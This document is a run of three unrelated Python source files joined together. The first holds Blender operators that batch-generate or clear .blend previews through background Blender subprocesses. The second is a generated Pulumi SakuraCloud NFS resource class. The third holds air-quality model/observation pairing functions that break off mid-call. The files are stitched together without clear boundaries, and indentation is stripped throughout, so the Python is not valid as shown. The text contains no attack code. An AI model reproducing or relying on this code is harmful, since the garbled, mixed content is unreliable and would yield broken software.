# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Operator
from bpy.props import (
StringProperty,
BoolProperty,
CollectionProperty,
)
# ########## Datablock previews... ##########
class WM_OT_previews_batch_generate(Operator):
"""Generate selected .blend file's previews"""
bl_idname = "wm.previews_batch_generate"
bl_label = "Batch-Generate Previews"
bl_options = {'REGISTER'}
# -----------
# File props.
files = CollectionProperty(
type=bpy.types.OperatorFileListElement,
options={'HIDDEN', 'SKIP_SAVE'},
)
directory = StringProperty(
maxlen=1024,
subtype='FILE_PATH',
options={'HIDDEN', 'SKIP_SAVE'},
)
# Show only images/videos, and directories!
filter_blender = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
filter_folder = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
# -----------
# Own props.
use_scenes = BoolProperty(
default=True,
name="Scenes",
description="Generate scenes' previews",
)
use_groups = BoolProperty(
default=True,
name="Groups",
description="Generate groups' previews",
)
use_objects = BoolProperty(
default=True,
name="Objects",
description="Generate objects' previews",
)
use_intern_data = BoolProperty(
default=True,
name="Mat/Tex/...",
description="Generate 'internal' previews (materials, textures, images, etc.)",
)
use_trusted = BoolProperty(
default=False,
name="Trusted Blend Files",
description="Enable python evaluation for selected files",
)
use_backups = BoolProperty(
default=True,
name="Save Backups",
description="Keep a backup (.blend1) version of the files when saving with generated previews",
)
def invoke(self, context, event):
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def execute(self, context):
import os
import subprocess
from bl_previews_utils import bl_previews_render as preview_render
context.window_manager.progress_begin(0, len(self.files))
context.window_manager.progress_update(0)
for i, fn in enumerate(self.files):
blen_path = os.path.join(self.directory, fn.name)
cmd = [
bpy.app.binary_path,
"--background",
"--factory-startup",
"-noaudio",
]
if self.use_trusted:
cmd.append("--enable-autoexec")
cmd.extend([
blen_path,
"--python",
os.path.join(os.path.dirname(preview_render.__file__), "bl_previews_render.py"),
"--",
])
if not self.use_scenes:
cmd.append('--no_scenes')
if not self.use_groups:
cmd.append('--no_groups')
if not self.use_objects:
cmd.append('--no_objects')
if not self.use_intern_data:
cmd.append('--no_data_intern')
if not self.use_backups:
cmd.append("--no_backups")
if subprocess.call(cmd):
self.report({'ERROR'}, "Previews generation process failed for file '%s'!" % blen_path)
context.window_manager.progress_end()
return {'CANCELLED'}
context.window_manager.progress_update(i + 1)
context.window_manager.progress_end()
return {'FINISHED'}
class WM_OT_previews_batch_clear(Operator):
"""Clear selected .blend file's previews"""
bl_idname = "wm.previews_batch_clear"
bl_label = "Batch-Clear Previews"
bl_options = {'REGISTER'}
# -----------
# File props.
files = CollectionProperty(
type=bpy.types.OperatorFileListElement,
options={'HIDDEN', 'SKIP_SAVE'},
)
directory = StringProperty(
maxlen=1024,
subtype='FILE_PATH',
options={'HIDDEN', 'SKIP_SAVE'},
)
# Show only images/videos, and directories!
filter_blender = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
filter_folder = BoolProperty(
default=True,
options={'HIDDEN', 'SKIP_SAVE'},
)
# -----------
# Own props.
use_scenes = BoolProperty(
default=True,
name="Scenes",
description="Clear scenes' previews",
)
use_groups = BoolProperty(default=True,
name="Groups",
description="Clear groups' previews",
)
use_objects = BoolProperty(
default=True,
name="Objects",
description="Clear objects' previews",
)
use_intern_data = BoolProperty(
default=True,
name="Mat/Tex/...",
description="Clear 'internal' previews (materials, textures, images, etc.)",
)
use_trusted = BoolProperty(
default=False,
name="Trusted Blend Files",
description="Enable python evaluation for selected files",
)
use_backups = BoolProperty(
default=True,
name="Save Backups",
description="Keep a backup (.blend1) version of the files when saving with cleared previews",
)
def invoke(self, context, event):
context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def execute(self, context):
import os
import subprocess
from bl_previews_utils import bl_previews_render as preview_render
context.window_manager.progress_begin(0, len(self.files))
context.window_manager.progress_update(0)
for i, fn in enumerate(self.files):
blen_path = os.path.join(self.directory, fn.name)
cmd = [
bpy.app.binary_path,
"--background",
"--factory-startup",
"-noaudio",
]
if self.use_trusted:
cmd.append("--enable-autoexec")
cmd.extend([
blen_path,
"--python",
os.path.join(os.path.dirname(preview_render.__file__), "bl_previews_render.py"),
"--",
"--clear",
])
if not self.use_scenes:
cmd.append('--no_scenes')
if not self.use_groups:
cmd.append('--no_groups')
if not self.use_objects:
cmd.append('--no_objects')
if not self.use_intern_data:
cmd.append('--no_data_intern')
if not self.use_backups:
cmd.append("--no_backups")
if subprocess.call(cmd):
self.report({'ERROR'}, "Previews clear process failed for file '%s'!" % blen_path)
context.window_manager.progress_end()
return {'CANCELLED'}
context.window_manager.progress_update(i + 1)
context.window_manager.progress_end()
return {'FINISHED'}
classes = (
WM_OT_previews_batch_clear,
WM_OT_previews_batch_generate,
)

# File: sdk/python/pulumi_sakuracloud/nfs.py
# Repo: sacloud/pulumi-sakuracloud @ 3eff14c (ECL-2.0 / Apache-2.0 license)

# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NFSArgs', 'NFS']
@pulumi.input_type
class NFSArgs:
def __init__(__self__, *,
network_interface: pulumi.Input['NFSNetworkInterfaceArgs'],
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a NFS resource.
:param pulumi.Input['NFSNetworkInterfaceArgs'] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "network_interface", network_interface)
if description is not None:
pulumi.set(__self__, "description", description)
if icon_id is not None:
pulumi.set(__self__, "icon_id", icon_id)
if name is not None:
pulumi.set(__self__, "name", name)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> pulumi.Input['NFSNetworkInterfaceArgs']:
"""
An `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@network_interface.setter
def network_interface(self, value: pulumi.Input['NFSNetworkInterfaceArgs']):
pulumi.set(self, "network_interface", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> Optional[pulumi.Input[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@icon_id.setter
def icon_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "icon_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _NFSState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input['NFSNetworkInterfaceArgs']] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NFS resources.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input['NFSNetworkInterfaceArgs'] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if icon_id is not None:
pulumi.set(__self__, "icon_id", icon_id)
if name is not None:
pulumi.set(__self__, "name", name)
if network_interface is not None:
pulumi.set(__self__, "network_interface", network_interface)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if size is not None:
pulumi.set(__self__, "size", size)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> Optional[pulumi.Input[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@icon_id.setter
def icon_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "icon_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> Optional[pulumi.Input['NFSNetworkInterfaceArgs']]:
"""
An `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@network_interface.setter
def network_interface(self, value: Optional[pulumi.Input['NFSNetworkInterfaceArgs']]):
pulumi.set(self, "network_interface", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
class NFS(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a SakuraCloud NFS.
## Example Usage
```python
import pulumi
import pulumi_sakuracloud as sakuracloud
foobar_switch = sakuracloud.Switch("foobarSwitch")
foobar_nfs = sakuracloud.NFS("foobarNFS",
plan="ssd",
size=500,
network_interface=sakuracloud.NFSNetworkInterfaceArgs(
switch_id=foobar_switch.id,
ip_address="192.168.11.101",
netmask=24,
gateway="192.168.11.1",
),
description="description",
tags=[
"tag1",
"tag2",
])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
:param pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']] network_interface: An `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
:param pulumi.Input[str] zone: The name of zone that the NFS will be created. (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NFSArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a SakuraCloud NFS.
## Example Usage
```python
import pulumi
import pulumi_sakuracloud as sakuracloud
foobar_switch = sakuracloud.Switch("foobarSwitch")
foobar_nfs = sakuracloud.NFS("foobarNFS",
plan="ssd",
size=500,
network_interface=sakuracloud.NFSNetworkInterfaceArgs(
switch_id=foobar_switch.id,
ip_address="192.168.11.101",
netmask=24,
gateway="192.168.11.1",
),
description="description",
tags=[
"tag1",
"tag2",
])
```
:param str resource_name: The name of the resource.
:param NFSArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NFSArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NFSArgs.__new__(NFSArgs)
__props__.__dict__["description"] = description
__props__.__dict__["icon_id"] = icon_id
__props__.__dict__["name"] = name
if network_interface is None and not opts.urn:
raise TypeError("Missing required property 'network_interface'")
__props__.__dict__["network_interface"] = network_interface
__props__.__dict__["plan"] = plan
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
super(NFS, __self__).__init__(
'sakuracloud:index/nFS:NFS',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
icon_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_interface: Optional[pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']]] = None,
plan: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None) -> 'NFS':
"""
Get an existing NFS resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the NFS. The length of this value must be in the range [`1`-`512`].
:param pulumi.Input[str] icon_id: The icon id to attach to the NFS.
:param pulumi.Input[str] name: The name of the NFS. The length of this value must be in the range [`1`-`64`].
        :param pulumi.Input[pulumi.InputType['NFSNetworkInterfaceArgs']] network_interface: A `network_interface` block as defined below.
:param pulumi.Input[str] plan: The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
:param pulumi.Input[int] size: The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Any tags to assign to the NFS.
        :param pulumi.Input[str] zone: The name of the zone in which the NFS will be created (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NFSState.__new__(_NFSState)
__props__.__dict__["description"] = description
__props__.__dict__["icon_id"] = icon_id
__props__.__dict__["name"] = name
__props__.__dict__["network_interface"] = network_interface
__props__.__dict__["plan"] = plan
__props__.__dict__["size"] = size
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
return NFS(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the NFS. The length of this value must be in the range [`1`-`512`].
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="iconId")
def icon_id(self) -> pulumi.Output[Optional[str]]:
"""
The icon id to attach to the NFS.
"""
return pulumi.get(self, "icon_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the NFS. The length of this value must be in the range [`1`-`64`].
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterface")
def network_interface(self) -> pulumi.Output['outputs.NFSNetworkInterface']:
"""
        A `network_interface` block as defined below.
"""
return pulumi.get(self, "network_interface")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[Optional[str]]:
"""
The plan name of the NFS. This must be one of [`hdd`/`ssd`]. Changing this forces a new resource to be created. Default:`hdd`.
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter
def size(self) -> pulumi.Output[Optional[int]]:
"""
The size of NFS in GiB. Changing this forces a new resource to be created. Default:`100`.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Any tags to assign to the NFS.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def zone(self) -> pulumi.Output[str]:
"""
        The name of the zone in which the NFS will be created (e.g. `is1a`, `tk1a`). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "zone")
from __future__ import absolute_import, print_function
from numpy import NaN, sort
from pandas import concat
from . import interpolation as interpo
from ..obs import epa_util
def combine(model=None, obs=None):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model` (the default is None).
obs : type
Description of parameter `obs` (the default is None).
Returns
-------
type
Description of returned object.
"""
    if model.objtype == 'CMAQ' and obs.objtype == 'AirNow':
        df = combine_aqs_cmaq(model, obs)
    elif model.objtype == 'CAMX' and obs.objtype == 'AirNow':
        df = combine_aqs_camx(model, obs)
    elif model.objtype == 'CMAQ' and obs.objtype == 'AQS':
        if obs.daily:
            df = combine_daily_aqs_cmaq(model, obs)
        else:
            df = combine_aqs_cmaq(model, obs)
    elif model.objtype == 'CAMX' and obs.objtype == 'AQS':
        if obs.daily:
            df = combine_daily_aqs_camx(model, obs)
        else:
            df = combine_aqs_camx(model, obs)
    elif model.objtype in ('CMAQ', 'CAMX') and obs.objtype == 'TOLNET':
        # combine_tolnet_model returns paired model/obs datasets, not a DataFrame
        return combine_tolnet_model(model, obs)
    else:
        raise ValueError('unsupported model/obs pairing: '
                         '{}/{}'.format(model.objtype, obs.objtype))
    return df
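The chain of ``objtype`` checks above is a hand-rolled dispatch table. A minimal standalone sketch of the same pattern, using hypothetical stand-in combiners (`_cmaq_airnow` etc. are illustrative, not the real MONET functions):

```python
# Hypothetical sketch of the (model.objtype, obs.objtype) dispatch above as a
# lookup table; the stand-in combiners just return a tag for illustration.
def _cmaq_airnow(model, obs):
    return 'cmaq+airnow'


def _camx_airnow(model, obs):
    return 'camx+airnow'


_DISPATCH = {
    ('CMAQ', 'AirNow'): _cmaq_airnow,
    ('CAMX', 'AirNow'): _camx_airnow,
}


def dispatch_combine(model_type, obs_type, model=None, obs=None):
    # Unknown pairings fail loudly instead of returning an unbound name.
    try:
        func = _DISPATCH[(model_type, obs_type)]
    except KeyError:
        raise ValueError('unsupported pairing: %s/%s' % (model_type, obs_type))
    return func(model, obs)
```

A table like this also makes the supported pairings enumerable, which the if-chain does not.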
def combine_crn(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
    comparelist = obs.df.Species.unique()
    g = obs.df.groupby('Species')
    dfs = []
    for i in comparelist:
        if i == 'SUR_TEMP':
            if 'TEMPG' in model.keys:
                dfmet = g.get_group(i)
                cmaq = model.get_var(param='TEMPG').compute()
                dfmet = interpo.interp_to_obs(cmaq, dfmet, model.latitude.values, model.longitude.values,
                                              radius=model.dset.XCELL)
                dfmet.Obs += 273.15  # CRN reports degrees C; the model is in K
                dfs.append(dfmet)
        elif i == 'T_HR_AVG':
            if 'TEMP2' in model.keys:
                dfmet = g.get_group(i)
                cmaq = model.get_var(param='TEMP2').compute()
                dfmet = interpo.interp_to_obs(cmaq, dfmet, model.latitude.values, model.longitude.values,
                                              radius=model.dset.XCELL)
                dfmet.Obs += 273.15
                dfs.append(dfmet)
        elif i == 'SOLARAD':
            if 'RGRND' in model.keys:
                dfmet = g.get_group(i)
                cmaq = model.get_var(param='RGRND').compute()
                dfmet = interpo.interp_to_obs(cmaq, dfmet, model.latitude.values, model.longitude.values,
                                              radius=model.dset.XCELL)
                dfs.append(dfmet)
        elif i in ('SOIL_MOISTURE_5', 'SOIL_MOISTURE_10'):
            if 'SOILW' in model.keys:
                dfmet = g.get_group(i)
                cmaq = model.get_var(param='SOILW').compute()
                dfmet = interpo.interp_to_obs(cmaq, dfmet, model.latitude.values, model.longitude.values,
                                              radius=model.dset.XCELL)
                dfs.append(dfmet)
    df = concat(dfs)
    df.dropna(inplace=True, subset=['Obs', 'model'])
    return df
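Every branch above funnels through `interpo.interp_to_obs`, which maps the 2-D model grid onto point observation sites. A rough, self-contained sketch of that idea (nearest grid cell within a cutoff radius; the real routine is more capable, and `nearest_grid_values` is an illustrative name, not MONET's API):

```python
import numpy as np


def nearest_grid_values(grid_vals, grid_lat, grid_lon, obs_lat, obs_lon, radius):
    # Flatten the 2-D model grid and, for each observation site, take the
    # value of the closest grid cell; sites farther than `radius` (in the
    # same degree-space distance metric) get NaN.
    pts = np.column_stack([grid_lat.ravel(), grid_lon.ravel()])
    vals = np.asarray(grid_vals, dtype=float).ravel()
    out = np.empty(len(obs_lat))
    for k, (la, lo) in enumerate(zip(obs_lat, obs_lon)):
        d = np.hypot(pts[:, 0] - la, pts[:, 1] - lo)
        j = d.argmin()
        out[k] = vals[j] if d[j] <= radius else np.nan
    return out
```

A KD-tree would replace the brute-force loop for large grids, but the contract is the same: one model value per site, NaN when no cell is close enough.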
def combine_improve_cmaq(model=None, obs=None):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model` (the default is None).
obs : type
Description of parameter `obs` (the default is None).
Returns
-------
type
Description of returned object.
"""
    comparelist = sort(obs.df.Species.unique())
    g = obs.df.groupby('Species')
    dfs = []
    for i in comparelist:
        if i == 'CLf':
            if ('ACLI' in model.keys) | ('ACLJ' in model.keys) | ('PM25_CL' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='CLf', improve_param=i)
                cmaq = model.get_var(lay=0, param='CLf').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'PM10':
            dfpm = g.get_group(i)
            fac = epa_util.check_cmaq_units(param='PM10', improve_param=i)
            cmaq = model.get_var(lay=0, param='PM10').compute() * fac
            dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                         radius=model.dset.XCELL)
            dfs.append(dfpm)
        elif i == 'PM2.5':
            dfpm = g.get_group(i)
            fac = epa_util.check_cmaq_units(param='PM25', improve_param=i)
            cmaq = model.get_var(lay=0, param='PM25').compute() * fac
            dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                         radius=model.dset.XCELL)
            dfs.append(dfpm)
        elif i == 'NAf':
            if ('ANAI' in model.keys) | ('ANAJ' in model.keys) | ('PM25_NA' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='NAf', improve_param=i)
                cmaq = model.get_var(lay=0, param='NAf').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'MGf':
            if ('AMGI' in model.keys) | ('AMGJ' in model.keys) | ('PM25_MG' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='MGf', improve_param=i)
                cmaq = model.get_var(lay=0, param='AMGJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'TIf':
            if 'ATIJ' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='TIj', improve_param=i)
                cmaq = model.get_var(lay=0, param='ATIJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'SIf':
            if 'ASIJ' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='SIj', improve_param=i)
                cmaq = model.get_var(lay=0, param='ASIJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'Kf':
            if ('AKI' in model.keys) | ('AKJ' in model.keys) | ('PM25_K' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='Kf', improve_param=i)
                cmaq = model.get_var(lay=0, param='Kf').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'CAf':
            if ('ACAJ' in model.keys) | ('PM25_CA' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='CAf', improve_param=i)
                cmaq = model.get_var(lay=0, param='ACAJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'SO4f':
            if ('ASO4I' in model.keys) | ('ASO4J' in model.keys) | ('PM25_SO4' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='SO4f', improve_param=i)
                cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
